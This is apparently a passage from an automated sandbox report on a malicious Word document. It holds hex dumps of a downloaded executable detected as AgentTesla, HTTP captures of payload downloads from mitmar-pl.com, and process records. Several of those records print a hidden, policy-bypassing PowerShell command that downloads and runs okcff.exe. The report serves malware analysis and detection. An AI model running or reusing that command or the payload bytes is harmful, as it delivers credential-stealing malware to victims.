99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28 17 00 00 06 28 05 00 00 0a 13 2a 20 01 00 00 00 7e 68 00 00 04 39 98 ff ff ff 26 20 01 00 00 00 38 8d ff ff ff 11 2f 28 16 00 00 06 74 04 00 00 01 13 17 38 bf ff ff ff 28 18 00 00 06 11 2a 28 12 00 00 06 13 19 20 00 00 00 00 7e 0d 00 00 04 39 5d ff ff ff 26 20 00 00 00 00 38 52 ff ff ff dd 03 03 00 00 11 2f 75 14 00 00 01 13 1a 38 16 00 00 00 fe 0c 0f 00 45 02 00 00 00 32 00 00 00 26 00 00 00 38 2d 00 00 00 11 1a 3a 1a 00 00 00 20 00 00 00 00 7e 50 00 00 04 3a d8 ff ff ff 26 20 00 00 00 00 38 cd ff ff ff 11 1a 6f
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELY0TNs @ @@sKX H.textTS T `.rsrcXV@@.reloc @B0sHB/Hr0rp((((*0Q $8$ESc^7>2([m88M ~_:& 8(Eq^8io8/(:8 8,((* ~h9& 8/(t8(*( ~9]& 8R/u8E2&8-: ~P:& 8o


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.224916937.0.9.16680C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 14, 2022 10:23:23.479233027 CET408OUTGET /okcff.exe HTTP/1.1
                                                          Host: mitmar-pl.com
                                                          Connection: Keep-Alive
                                                          Jan 14, 2022 10:23:23.507251978 CET410INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 14 Jan 2022 09:23:23 GMT
                                                          Content-Type: application/x-msdownload
                                                          Content-Length: 194560
                                                          Last-Modified: Fri, 14 Jan 2022 05:56:32 GMT
                                                          Connection: keep-alive
                                                          ETag: "61e11090-2f800"
                                                          Accept-Ranges: bytes
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28 17 00 00 06 28 05 00 00 0a 13 2a 20 01 00 00 00 7e 68 00 00 04 39 98 ff ff ff 26 20 01 00 00 00 38 8d ff ff ff 11 2f 28 16 00 00 06 74 04 00 00 01 13 17 38 bf ff ff ff 28 18 00 00 06 11 2a 28 12 00 00 06 13 19 20 00 00 00 00 7e 0d 00 00 04 39 5d ff ff ff 26 20 00 00 00 00 38 52 ff ff ff dd 03 03 00 00 11 2f 75 14 00 00 01 13 1a 38 16 00 00 00 fe 0c 0f 00 45 02 00 00 00 32 00 00 00 26 00 00 00 38 2d 00 00 00 11 1a 3a 1a 00 00 00 20 00 00 00 00 7e 50 00 00 04 3a d8 ff ff ff 26 20 00 00 00 00 38 cd ff ff ff 11 1a 6f
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELY0TNs @ @@sKX H.textTS T `.rsrcXV@@.reloc @B0sHB/Hr0rp((((*0Q $8$ESc^7>2([m88M ~_:& 8(Eq^8io8/(:8 8,((* ~h9& 8/(t8(*( ~9]& 8R/u8E2&8-: ~P:& 8o


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.224917037.0.9.16680C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 14, 2022 10:23:27.105874062 CET612OUTGET /Crkrqdrd.jpeg HTTP/1.1
                                                          Host: mitmar-pl.com
                                                          Connection: Keep-Alive
                                                          Jan 14, 2022 10:23:27.134126902 CET614INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 14 Jan 2022 09:23:27 GMT
                                                          Content-Type: image/jpeg
                                                          Content-Length: 519680
                                                          Last-Modified: Fri, 14 Jan 2022 05:40:37 GMT
                                                          Connection: keep-alive
                                                          ETag: "61e10cd5-7ee00"
                                                          Accept-Ranges: bytes
                                                          Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 c0 00 00 00 0c 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 08 00 38 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 08 00 34 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 6c 00 6c 00 64 00 2e 00 64 00 72 00 6b 00 62 00 6d 00 73 00 78 00 79 00 6e 00 69 00 69 00 73 00 6f 00 77 00 67 00 74 00 74 00 67 00 53 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 18 00 58 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65 00 64 00 61 00 72 00 54 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 2a 00 00 00 00 00 32 00 32 00 30 00 32 00 20 00 a9 00 20 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 00 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 6c 00 61 00 67 00 65 00 4c 00 01 00 11 00 46 00 00 00 6c 00 6c 00 64 00 2e 00 64 00 72 00 6b 00 62 00 6d 00 73 00 78 00 79 00 6e 00 69 00 69 00 73 00 6f 00 77 00 67 00 74 00 74 00 67 00 53 00 00 00 65 00 6d 00 61 00 4e 00 6c 00 61 00 6e 00 72 00 65 00 74 00 6e 00 49 00 01 00 18 00 50 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 00 00 6e 00 6f 00 69 00 73 00
                                                          Data Ascii: 40.0.0.1noisreV ylbmessA80.0.0.1noisreVtcudorP4emaNtcudorP"lld.drkbmsxyniisowgttgSemaneliFlanigirOXskramedarTlageL*2202 thgirypoCthgirypoClageLFlld.drkbmsxyniisowgttgSemaNlanretnIP0.0.0.1nois


                                                          Code Manipulations

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          Analysis Process: WINWORD.EXE PID: 2724 Parent PID: 596

                                                          General

                                                          Start time:10:22:23
                                                          Start date:14/01/2022
                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                          Imagebase:0x13f6b0000
                                                          File size:1423704 bytes
                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Analysis Process: powershell.exe PID: 2904 Parent PID: 2724

                                                          General

                                                          Start time:10:22:27
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                                                          Imagebase:0x13f9e0000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.436663453.0000000000380000.00000004.00000020.sdmp, Author: Florian Roth
                                                          Reputation:high

                                                          Analysis Process: powershell.exe PID: 1308 Parent PID: 2724

                                                          General

                                                          Start time:10:22:29
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                                                          Imagebase:0x13f9e0000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000005.00000002.438152998.00000000003A0000.00000004.00000020.sdmp, Author: Florian Roth
                                                          Reputation:high

                                                          Analysis Process: powershell.exe PID: 292 Parent PID: 2724

                                                          General

                                                          Start time:10:22:29
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                                                          Imagebase:0x13f9e0000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          Analysis Process: okcff.exe PID: 2656 Parent PID: 292

                                                          General

                                                          Start time:10:22:34
                                                          Start date:14/01/2022
                                                          Path:C:\Users\user\AppData\Roaming\okcff.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Roaming\okcff.exe"
                                                          Imagebase:0x9f0000
                                                          File size:194560 bytes
                                                          MD5 hash:E9416A322E9A796D45588BC4FB04CD45
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.623662053.000000000356F000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.621443805.00000000023AD000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.621033509.0000000001E30000.00000004.00020000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low

                                                          Analysis Process: cmd.exe PID: 2028 Parent PID: 2656

                                                          General

                                                          Start time:10:22:37
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a190000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Analysis Process: timeout.exe PID: 1972 Parent PID: 2028

                                                          General

                                                          Start time:10:22:37
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x9f0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          Analysis Process: cmd.exe PID: 2104 Parent PID: 2656

                                                          General

                                                          Start time:10:22:41
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a6d0000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Analysis Process: timeout.exe PID: 2060 Parent PID: 2104

                                                          General

                                                          Start time:10:22:42
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x2e0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          Analysis Process: cmd.exe PID: 1864 Parent PID: 2656

                                                          General

                                                          Start time:10:22:44
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a270000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: timeout.exe PID: 2100 Parent PID: 1864

                                                          General

                                                          Start time:10:22:45
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x6e0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: cmd.exe PID: 1892 Parent PID: 2656

                                                          General

                                                          Start time:10:22:47
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a030000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: verclsid.exe PID: 2432 Parent PID: 2724

                                                          General

                                                          Start time:10:22:48
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\verclsid.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                                                          Imagebase:0xff0a0000
                                                          File size:11776 bytes
                                                          MD5 hash:3796AE13F680D9239210513EDA590E86
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: timeout.exe PID: 2780 Parent PID: 1892

                                                          General

                                                          Start time:10:22:48
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0xf0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: notepad.exe PID: 2652 Parent PID: 2724

                                                          General

                                                          Start time:10:22:50
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\notepad.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                                                          Imagebase:0xff910000
                                                          File size:193536 bytes
                                                          MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: cmd.exe PID: 2712 Parent PID: 2656

                                                          General

                                                          Start time:10:22:51
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a7b0000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: timeout.exe PID: 2228 Parent PID: 2712

                                                          General

                                                          Start time:10:22:52
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x6b0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: cmd.exe PID: 448 Parent PID: 2656

                                                          General

                                                          Start time:10:22:54
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a2a0000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: timeout.exe PID: 2632 Parent PID: 448

                                                          General

                                                          Start time:10:22:55
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x4e0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: cmd.exe PID: 2792 Parent PID: 2656

                                                          General

                                                          Start time:10:22:59
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4ac50000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: timeout.exe PID: 1188 Parent PID: 2792

                                                          General

                                                          Start time:10:23:00
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0xae0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: cmd.exe PID: 836 Parent PID: 2656

                                                          General

                                                          Start time:10:23:04
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a970000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: timeout.exe PID: 1308 Parent PID: 836

                                                          General

                                                          Start time:10:23:05
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0xe80000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: cmd.exe PID: 2424 Parent PID: 2656

                                                          General

                                                          Start time:10:23:09
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a700000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: timeout.exe PID: 1204 Parent PID: 2424

                                                          General

                                                          Start time:10:23:10
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x4f0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: okcff.exe PID: 2176 Parent PID: 2656

                                                          General

                                                          Start time:10:23:54
                                                          Start date:14/01/2022
